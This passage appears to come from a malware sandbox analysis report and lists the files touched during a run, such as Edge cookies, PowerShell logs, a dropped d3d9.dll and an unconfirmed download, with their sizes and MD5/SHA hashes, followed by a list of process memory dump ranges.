b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa

SHA512
e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
75c9f57baeefeecd6c184627de951c1e

SHA1
52e0468e13cbfc9f15fc62cc27ce14367a996cff

SHA256
648ba270261690bb792f95d017e134d81a612ef4fc76dc41921c9e5b8f46d98f

SHA512
c4570cc4bb4894de3ecc8eee6cd8bfa5809ea401ceef683557fb170175ff4294cc21cdc6834db4e79e5e82d3bf16105894fff83290d26343423324bc486d4a15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
10fa19df148444a77ceec60cabd2ce21

SHA1
685b599c497668166ede4945d8885d204fd8d70f

SHA256
c3b5deb970d0f06a05c8111da90330ffe25da195aafa4e182211669484d1964b

SHA512
3518ce16fef66c59e0bdb772db51aeaa9042c44ca399be61ca3d9979351f93655393236711cf2b1988d5f90a5b9318a7569a8cef3374fc745a8f9aa8323691ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
edd9578bc1e45c27ab91a0d183f95c15

SHA1
cb324af25534cb4f9778f21296976130497c9185

SHA256
b926ee2e2880f2431ba777c9581b7055a592c9409acb9fa607d73adbb0d4bccd

SHA512
7bf0077f988d370c2fd3755ab5863c611347c4e05b7c829e8e7ffceb4bfa2c5d379176480431cb1d38626965a53b26a5b4713b01cdc7fc8b32305fca7c09017d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
265B

MD5
f5cd008cf465804d0e6f39a8d81f9a2d

SHA1
6b2907356472ed4a719e5675cc08969f30adc855

SHA256
fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d

SHA512
dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7820d3199b4765c4abbd7b52c80c03c6

SHA1
ac7882eaa4cb78d95e0f4981a0eb4452e99083d2

SHA256
e75499f1324221ac6c8a042d012d90fe61106deffa814667eabc996283a4bd0a

SHA512
61f433c2bc9b15bf383964f5e6a832110e449fc32c1093acf0eeae917e8e8242175d054d1f694251af57b47fc93cc7190cc8ce93ad4b25c38395b68ad339a91e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8b3cc0bf6bf524550194b4956b4c54fb

SHA1
15b42278006c20ca269c16191b8b5f6ac407dfbb

SHA256
86bd8acffbd6e03a7f0c98f5beb59d84b296c7f0ad5cee13b5456929a8501de2

SHA512
a2be1a160ab463aaad006c35fef4b8d0b13b985fd5cd2dfded032d6e55c4f4e75f0dd9eff54513422aca6299e11d70a00e9c1d0da3196b15f43843796633de03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4656de458fc7a90b06d00ab644cfcd61

SHA1
a1151384fcdec2f13d3fb18485050f4cf57efab2

SHA256
069bd245cd981ef948091150ab043a1614b150f4b80bd0250dec0f2d35952226

SHA512
e1205ff94853cca7a518236fa99602a645fe948ba02c2ca83d05a4bf76e56825cc8e63e96463fe32aa71bffff3488642fba1d3dcf401c69da6d43923f2512cb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
6cd0b0ae487b84bad5b1e5af42cbe361

SHA1
2f944de581c4684d2af40b76ab9dc4f8b8489c1e

SHA256
3319e4432bba65254d74cbdee6b2e6af1abe518a0abaa3d3130f0ff2a3b1aa11

SHA512
4489e2d5007ee1f249bfc4f7cd21d491b8cca38e82cd6a35865c3f4b60085b22d38e8bb56e70a8b1f6863b38fde68f0bc8544f05633adf28f62d3b529f2dff6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
dabd9a1380a3ad23bde1ef98db238bea

SHA1
f191016b95d9ee29cc6d93144f6b509d442aa35c

SHA256
fbeec561eb7745da7c88fcc1fa452ee3ae1657d627d21da8efb5c3dae109a811

SHA512
94b4a754feb8abf710fb614a3b409932a5149cbf6a2e8534428887957ce4861ad9144f9d03f4886b23e6767693c2e98c3660458e5ac6ae9a5526c3ea03da7891

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e4927f1bb6d2e21dd9edd0d0a03d6a78

SHA1
5e059a065a455ddc2ade77393ee1d8a6c32a6654

SHA256
1846a6d84d5053383549ad2176b534b2c0b217c5e6ed5e5a3c94cc5cda40b841

SHA512
19cc6e6569e0c392460b0d02ba54e7e4227b681d126c4e749be0822409dfc506890737834f0ad6b741c5c4fc2b447d983c43d658ec9960694d60c3ceffa32d48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2419d068e09423d5e7edec9bb8010870

SHA1
445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba

SHA256
d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac

SHA512
053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
692a440f9cfbeaf648632aead685a5a1

SHA1
e4e4bd8405be77294f4be5ea18b5e05b139f35af

SHA256
3e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4

SHA512
c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef72c47dbfaae0b9b0d09f22ad4afe20

SHA1
5357f66ba69b89440b99d4273b74221670129338

SHA256
692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f

SHA512
7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkqoqnqd.vlk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\logs\godot.log

Filesize
72B

MD5
58a292d79ff3903bea2f12bbef742979

SHA1
00f6d948204336c6c6e1f050e2a0c39122944b9a

SHA256
0b87558f1828175add70422ec56c9ed384e27515596950808d519bfafcab4bc1

SHA512
d40c91f07520e96a44d5080d086a6818e1a102d9c825abd637e9da8eee6cb757523dfe68880027ab1befd1f509592ee939e999be2bee2a2523b82387afbf5896

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CanvasShaderGLES3\4e9e83ef92cfe6b6881057f0e41e775d2f0a3ea470fb34af487edaa273c90c2c\fa7b62523470356194bdf709eb2639ab149a07cc.cache

Filesize
128KB

MD5
31493e258a21680bcb8e57ae1db77eaa

SHA1
bdef2bb9c4d5118bf65206e2109ba9af47a7c2bb

SHA256
f9807566566182192ee7f47955d9e2cde5aecda8380e4923c860afe75ac82127

SHA512
0254415318c4e90fb5c88b900939ce546be2964860be6fe117cd8c3ca8d53379dd21f512cf3aa8d5027debb61685cd6739b63dc1f52b6e0e862f2c1cdac921fa

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CopyShaderGLES3\f8827df5e23db5bc636a3d6c081f1b5ec27655db61c9d942fd9b2364a6b58de7\fa7b62523470356194bdf709eb2639ab149a07cc.cache

Filesize
60KB

MD5
b5e157aabf1ad8173f58afc808372572

SHA1
686897130946b9fc563fcbaf43ecf4ddff130648

SHA256
808932f74dbcf687842cbfa4428b80d2f9fe51a9ce4f829700f5e104f1245393

SHA512
4c199408bb17cd31b9ee9945cb1ace5ab6898bf0f9ada2f903867a96736097def1c1bcdf030b7d5f7545ab0086bf70e0fb61de9df727e180704322b73cd3727e

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\SceneShaderGLES3\fde6c2cbcc2ec71d9bf0aaa797b35a71635bb92f1057da48e6e13d5058805d9c\fa7b62523470356194bdf709eb2639ab149a07cc.cache

Filesize
343KB

MD5
858c90cf6f469533fa56359a33e91580

SHA1
97811818c89d34fe907bac6f49690b88b4d43a66

SHA256
0ec2129e8e633e289ec86ea0ebe1537067cb3f153aa13a58aaadfec1f9c1a9a5

SHA512
1cb99b324a4b4ee389afa8ca5428a49c03ed73159509697d5e380763f40e1abece7a130aff7e8e486316c69ffca6e00d6c5184957a9e12d916dca26394f71c53

Download Submit
C:\Users\Admin\AppData\Roaming\d3d9.dll

Filesize
437KB

MD5
106fe1980dbcb4fa2fe0c00b6d6fa7c2

SHA1
5cb7eb7be8f3d1641cb458024d868363658a2955

SHA256
c0716389100b55b09f46fafef37bb7d120453df3bfb1097dcd30e14bb97c09bc

SHA512
c9d48c5f5ecf83012f1cc16581b7bb283265a3808847af46195987c7b0721116fe7241185d67b5d7636080881da5f18df04e57e309ff5a133046dd87ca8d06ce

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 422435.crdownload

Filesize
17.8MB

MD5
5bc010a93fc0c8c9cff8cfd75d4d3789

SHA1
ccd129aa5a074d6308d1fa2fb287a3710a8c55f3

SHA256
2e16953cd6445d754b38f654a83ba81d7f34598b23882ca14f40f1ef88e64242

SHA512
a3e0481cb2316be56cfbde123b2087d01e3ade7f9e2f04b50c14bb2930a7d56620b47fa106cd92d5b4cd5fea412c668dab0dfb6f4986c564ab988a231373bd0a

Download Submit
memory/1420-224-0x0000022DC4050000-0x0000022DC406C000-memory.dmp

Filesize
112KB

Download
memory/1420-227-0x0000022DC45B0000-0x0000022DC45CC000-memory.dmp

Filesize
112KB

Download
memory/1420-228-0x0000022DC4590000-0x0000022DC459A000-memory.dmp

Filesize
40KB

Download
memory/1420-229-0x0000022DC45F0000-0x0000022DC460A000-memory.dmp

Filesize
104KB

Download
memory/1420-230-0x0000022DC45A0000-0x0000022DC45A8000-memory.dmp

Filesize
32KB

Download
memory/1420-231-0x0000022DC45D0000-0x0000022DC45D6000-memory.dmp

Filesize
24KB

Download
memory/1420-232-0x0000022DC45E0000-0x0000022DC45EA000-memory.dmp

Filesize
40KB

Download
memory/1420-226-0x0000022DC4440000-0x0000022DC444A000-memory.dmp

Filesize
40KB

Download
memory/1420-225-0x0000022DC4380000-0x0000022DC4435000-memory.dmp

Filesize
724KB

Download
memory/1864-245-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-243-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-244-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-249-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-250-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-251-0x0000024DB6D80000-0x0000024DB6DA0000-memory.dmp

Filesize
128KB

Download
memory/1864-254-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-255-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-252-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-256-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-253-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-248-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1864-246-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3604-305-0x0000000005520000-0x0000000005586000-memory.dmp

Filesize
408KB

Download
memory/3604-306-0x00000000062F0000-0x0000000006340000-memory.dmp

Filesize
320KB

Download
memory/3604-265-0x0000000000410000-0x0000000000460000-memory.dmp

Filesize
320KB

Download
memory/3604-323-0x0000000006D10000-0x000000000723C000-memory.dmp

Filesize
5.2MB

Download
memory/3604-267-0x0000000004F70000-0x0000000005514000-memory.dmp

Filesize
5.6MB

Download
memory/3604-268-0x00000000049C0000-0x0000000004A52000-memory.dmp

Filesize
584KB

Download
memory/3604-322-0x0000000006610000-0x00000000067D2000-memory.dmp

Filesize
1.8MB

Download
memory/3604-274-0x0000000004DD0000-0x0000000004E1C000-memory.dmp

Filesize
304KB

Download
memory/3604-270-0x0000000005B40000-0x0000000006158000-memory.dmp

Filesize
6.1MB

Download
memory/3604-272-0x0000000004BF0000-0x0000000004C02000-memory.dmp

Filesize
72KB

Download
memory/3604-269-0x0000000004960000-0x000000000496A000-memory.dmp

Filesize
40KB

Download
memory/3604-271-0x0000000004CC0000-0x0000000004DCA000-memory.dmp

Filesize
1.0MB

Download
memory/3604-273-0x0000000004C50000-0x0000000004C8C000-memory.dmp

Filesize
240KB

Download
memory/4812-257-0x0000000000AC0000-0x0000000000B58000-memory.dmp

Filesize
608KB

Download
memory/4812-258-0x0000000005340000-0x0000000005346000-memory.dmp

Filesize
24KB

Download
memory/5264-239-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5264-235-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5264-237-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5264-236-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5264-238-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5264-242-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5296-104-0x000001E1D50B0000-0x000001E1D50D2000-memory.dmp

Filesize
136KB

Download
memory/5540-304-0x00007FF784320000-0x00007FF788682000-memory.dmp

Filesize
67.4MB

Download
memory/5540-180-0x00007FF784320000-0x00007FF788682000-memory.dmp

Filesize
67.4MB

Download
memory/5540-156-0x00007FF784320000-0x00007FF788682000-memory.dmp

Filesize
67.4MB

Download
memory/5540-326-0x00007FF784320000-0x00007FF788682000-memory.dmp

Filesize
67.4MB

Download
memory/5540-328-0x00007FF784320000-0x00007FF788682000-memory.dmp

Filesize
67.4MB

Download
memory/6080-128-0x00007FF784320000-0x00007FF788682000-memory.dmp

Filesize
67.4MB

Download